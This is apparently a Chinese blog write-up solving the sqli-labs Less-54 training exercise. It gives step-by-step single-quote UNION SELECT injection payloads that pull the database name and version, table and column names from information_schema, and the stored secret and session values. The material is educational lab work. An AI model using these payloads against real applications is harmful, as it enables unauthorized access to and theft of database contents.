码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • sqli-labs/Less-54


    这一关的欢迎界面提示我们可以进行10次尝试注入 但是10次以后就会重置各种信息其中就包括数据库、表格、字段等等 其次提示我们以id作为注入点

    首先判断是否属于数字型注入 输入如下

    id=1 and 1=2

    回显如下 这个回显印证了两件事情 一个是该注入类型不属于数字一个是能够使用联合注入的方法 

    接着尝试输入一下1' 回显如下 没有正确回显 大概率是这个类型 但是也没有报错 我们不能从报错信息中获取到有用的东西 因此后续操作也就不能使用报错注入了

    那么只能够通过正确回显来判定自己的想法是否正确 这时需要借助注释符的力量 输入如下

    id=1'--+

    正确回显了 说明就是单引号注入类型

    接着我们通过联合注入进行各种爆破操作

    首先进行一下爆回显点操作 输入如下

    id=0' union select 1,2,3--+

    回显如下

    接着进行爆数据库和版本号的操作 输入如下

    id=0' union select 1,database(),version()--+

     回显如下

    然后进行报表操作 输入如下

    id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

    回显如下

    接着进行爆字段操作 输入如下

    id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='qnmd3l5c75'--+

     回显如下

    最后进行爆id和sessid操作 输入如下

    id=0' union select 1,2,group_concat(id,'-',sessid) from qnmd3l5c75--+

    回显如下

    在进行爆secret_V092和tryy字段的操作 输入如下

    id=0' union select 1,2,group_concat(secret_V092,'-',tryy) from qnmd3l5c75--+

     回显如下

    从最后爆字段的操作中我们可以知道sessid为用户名 secret_xxxx为密码 id就是纯粹的id tryy就是当前尝试次数 接下来的关卡就会用到了

    通关成功 嗨嗨!! 

  • 相关阅读:
    SpringBoot 统一异常处理
    磁盘存储器
    leetcode - 1293. Shortest Path in a Grid with Obstacles Elimination
    Leetcod graph(new topic)
    uqrcode+uni-app 微信小程序生成二维码
    (标签-ar|关键词-运算符)
    C#判断窗体是否被遮挡 - 开源研究系列文章
    虹科 | 解决方案 | 汽车示波器 远程诊断方案
    uniApp初体验-从零开始注意事项
    股票量化系统QTYX选股框架实战案例集|华为补涨龙三连板打板进,套利8个点离场-230908...
  • 原文地址:https://blog.csdn.net/m0_71299382/article/details/128019554
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号